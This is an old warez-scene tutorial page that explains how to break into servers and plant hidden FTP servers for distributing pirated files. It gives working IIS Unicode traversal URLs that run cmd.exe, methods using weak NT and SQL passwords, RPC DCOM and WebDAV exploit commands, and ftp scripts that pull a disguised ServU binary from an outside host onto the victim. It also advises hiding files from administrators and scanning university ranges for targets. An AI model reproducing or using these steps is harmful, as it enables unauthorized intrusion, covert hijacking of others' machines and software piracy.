FXPSECRETS.TK: FXP tutorials IIS Unicode pubstro hacking NT Pass pubstro hacking SQL pubstro hacking RPC Dcom pubstro hacking Webdav pubstro hacking IP range scanning Important files --- IIS Unicode pubstro hacking First, get the Ip and unicode url from your favorite FXP board or scan them yourself. 1.2.3.4 :: IP Exploit : IIS Hostname : somefastserver.com Unicode : /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe :: unicode url Drive c space : 7 map(pen) 11.295.252.480 bytes available :: bytes available on disk Drive d space : 8 map(pen) 23.276.408.832 bytes available Drive e space : 4 map(pen) 0 bytes beschikbaar ASP exploit : No Firewall : No :: thats what we need to succesfully put a stro on this server. Now, install ServU on your own PC. Make a nice server and dont forget to register your ServU copy with a valid serial. Now, take the configuration file (ServUDaemon.ini) and copy it to a folder along with WINMGNT.EXE, TLIST.EXE and KILL.EXE... Make a account at web1000.com and upload the files WINMGNT.EXE, ServUDaemon.ini, TLIST.EXE and KILL.EXE from yout local folder to your ftp account on web1000... Now we are starting with Unicode URL's in explorer, type http://"ip"/unicodeurl/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\Inetpub\scripts\line.exe Wait till it tells you there was 1 file copied... again, in explorer, type http://"ip"/scripts/line.exe?/c+echo+open+(your web1000 dns entry)+>+script.txt http://"ip"/scripts/line.exe?/c+echo+(your web1000 username)>>+script.txt http://"ip"/scripts/line.exe?/c+echo+(your web1000 password)>>+script.txt http://"ip"/scripts/line.exe?/c+echo+get+WINMGNT.EXE>>+script.txt http://"ip"/scripts/line.exe?/c+echo+get+KILL.EXE>>+script.txt http://"ip"/scripts/line.exe?/c+echo+get+TLIST.EXE>>+script.txt http://"ip"/scripts/line.exe?/c+echo+get+ServUDaemon.ini>>+script.txt http://"ip"/scripts/line.exe?/c+echo+bye>>+script.txt to verify these steps type in explorer http://"ip"/scripts/line.exe?/c+type+script.txt If it shows up like open bla.web1000.com bla_web1000_com wicked123 get WINMGNT.EXE get KILL.EXE get TLIST.EXE get ServUDaemon.ini bye then youll be set. Now, we need to transfer the files from our web1000 account to our IIS Server. We will use the program FTP.EXE for this. Dont worry, its already on the IIS server. The only thing we have to do is copying it to our directory on the IIS Server. in explorer type http://"ip"/scripts/line.exe?/c+copy+c:\winnt\system32\ftp.exe+ftp.exe Now we can start the transfering of the files. http://"ip"/scripts/line.exe?/c+ftp.exe+-i+-s:script.txt This will take a while, but its absolutely neccesary to let this complete totally. When the page is stopped loading, type in explorer, http://"ip"/scripts/line.exe?/c+dir verify if the files WINMGNT.EXE, TLIST.EXE, KILL.EXE and ServUDaemon.ini are there, and that their filesizes are correct. now, lets fire up the server by typing in explorer, http://"ip"/scripts/line.exe?/c+WINMGNT.EXE%20/h Let the page load for 10 seconds then close explorer. Check the FTP by logging in on the ip and port. If it works, congratulations! You hacked yerself a Stro! If it doesnt work, type http://"ip"/scripts/line.exe?/c+type+ServUStartuplog.txt in explorer. This will give you clues for what the problem is... If the webserver comes up with something like "file does not exist" then the server is already hacked or you dont have execution rights on the server. Type http://"ip"/scripts/tlist.exe to find out which processes are already running. If you see something like Servudaemon.exe or WINMGNT.EXE after you executed TLIST.EXE, just type http://"ip"/scripts/kill.exe?WINMGNT.EXE or http://"ip"/scripts/kill.exe?Servudaemon.exe and then try to start your own server again. --- NT Pass pubstro hacking Well, you know the drill, go to your FXP board and get a NT-Pass scan. Now, install ServU on your own PC. Make a nice server and dont forget to register your ServU copy with a valid serial. Now, take the configuration file (ServUDaemon.ini) and copy it to a folder along with WINMGNT.EXE... In explorer, type: \\IP\c$ If a popup appears and asks u for the username and the password, then type the strings you got from the scan. After a few second you will see their C drive. Now make a dir somewhere, I reccomend somewhere in the Windows folder so the sysop wont notice your work to fast and upload WINMGNT.EXE and Servudaemon.ini to it. Now its time to fire up our ftp server. Open up a command prompt on your own pc and navigate to the folder where you stored psexec.exe, pslist.exe and pskill.exe. type: psexec \\IP -d c:\path\to\files\winmgnt.exe Congratulations! Your server is now up and runnning! If your server is not up, try pslist \\IP and look if another server is already running. If this is the case, use pskill \\IP (serverprocessname.exe) and try starting up your own server again with the command psexec \\IP -d c:\path\to\files\winmgnt.exe --- SQL pubstro hacking First, get your ass down you FXP board and search for a SQL scan. Now, install ServU on your own PC. Make a nice server and dont forget to register your ServU copy with a valid serial. Now, take the configuration file (ServUDaemon.ini) and copy it to a folder along with WINMGNT.EXE, TLIST.EXE and KILL.EXE... Make a account at web1000.com and upload the files WINMGNT.EXE, ServUDaemon.ini, TLIST.EXE and KILL.EXE from yout local folder to your ftp account on web1000... Fire up SQLExec and fill out the host IP, username and password. Press connect. When you are connected you have to give the following commands. c echo open (your web1000 dns entry) > script.txt c echo (your web1000 username)>> script.txt c echo (your web1000 password)>> script.txt c echo get WINMGNT.EXE>> script.txt c echo get KILL.EXE>> script.txt c echo get TLIST.EXE>> script.txt c echo get ServUDaemon.ini>> script.txt c echo bye>> script.txt c copy c:\winnt\system32\ftp.exe ftp.exe c ftp.exe -i -s:script.txt c winmgnt.exe /h If everything went ok your FTP server is now done. If not, try to give the command c tlist.exe to find out which other processes are already running. If you see something like Servudaemon.exe or WINMGNT.EXE after you executed TLIST.EXE, just give the command c kill.exe WINMGNT.EXE or c kill.exe Servudaemon.exe and then try to start your own server with the command c winmgnt.exe /h --- RPC Dcom pubstro hacking First of all, get your ass to a FXP board, and search for some fresh RCP Dcom Scanz. Now, install ServU on your own PC. Make a nice server and dont forget to register your ServU copy with a valid serial. Now, take the configuration file (ServUDaemon.ini) and copy it to a folder along with WINMGNT.EXE... Make a account at web1000.com and upload the files WINMGNT.EXE and ServUDaemon.ini from your local folder to your ftp account on web1000... Then, fire up the command prompt, navigate to the dcom directory and use the following command, For a windows 2000 target, type "dcom -d (host)" For windows XP and 2003 target, type "dcom -d (host) -t 1" (both without the quotes) If everything is right, you should have a command prompt now on the remote computer. Now, the whole point is to get a FTP server here right? Type the following in the prompt on the remote computer. echo open (your web1000 dns entry) > script.txt echo (your web1000 username)>> script.txt echo (your web1000 password)>> script.txt echo get WINMGNT.EXE>> script.txt echo get KILL.EXE>> script.txt echo get TLIST.EXE>> script.txt echo get ServUDaemon.ini>> script.txt echo bye>> script.txt ftp.exe -i -s:script.txt winmgnt.exe /h Try now connecting to your server on the remote computer. If it doesnt work, then leave the remote PC alone, its already hacked. --- Webdav pubstro hacking First of all, get your ass to a FXP board, and search for some fresh Webdav Scanz. Now, install ServU on your own PC. Make a nice server and dont forget to register your ServU copy with a valid serial. Now, take the configuration file (ServUDaemon.ini) and copy it to a folder along with WINMGNT.EXE... Make a account at web1000.com and upload the files WINMGNT.EXE and ServUDaemon.ini from your local folder to your ftp account on web1000... Then, fire up the command prompt, navigate to the webdav3 directory and use the following command, "webdav3 (host)" (without the quotes) If everything is right, you should have a command prompt now on the remote computer. Now, the whole point is to get a FTP server here right? Type the following in the prompt on the remote computer. echo open (your web1000 dns entry) > script.txt echo (your web1000 username)>> script.txt echo (your web1000 password)>> script.txt echo get WINMGNT.EXE>> script.txt echo get KILL.EXE>> script.txt echo get TLIST.EXE>> script.txt echo get ServUDaemon.ini>> script.txt echo bye>> script.txt ftp.exe -i -s:script.txt winmgnt.exe /h Try now connecting to your server on the remote computer. If it doesnt work, then leave the remote PC alone, its already hacked. --- IP range scanning Allright, if you want to scan, you only want to scan the fast ranges because if you want to distribute warez, you want to distribute them as fast as possible. When you start scanning, the first thing you need to do is to find a fast range. - Universities have fast internet connections. So take a look at this website; http://geowww.uibk.ac.at/univ/ Here you will find all the universities over the whole world. Just pick a nice university and ping to it to get the ip of the university. Now you have to whois the ip. You can whois ip adresses at the following sites; http://www.apnic.net/ http://www.arin.net/ and http://www.ripe.net/ Whois the ip and the website will come up with the range you will have to scan. --- Important files These are the files you need to start making str0's... serverfiles.zip - You need these files to put a FTP server on a vulnerable server. iishack.zip - Files used in a hack with a vulnerable IIS server. nthack.zip - Files used in a hack with a server with a weak NT account. sqlhack.zip - Files used in a hack with a server with a weak MSSQL account. scanfiles.zip - Files used to scan vulnerable servers. (IIS, NT-Pass and SQL) advancedfiles.zip - Files for the diehard FXP guy/gal. Only touch if you can succesfull set up a ftp server on a vulnerable remote machine. ---EOF---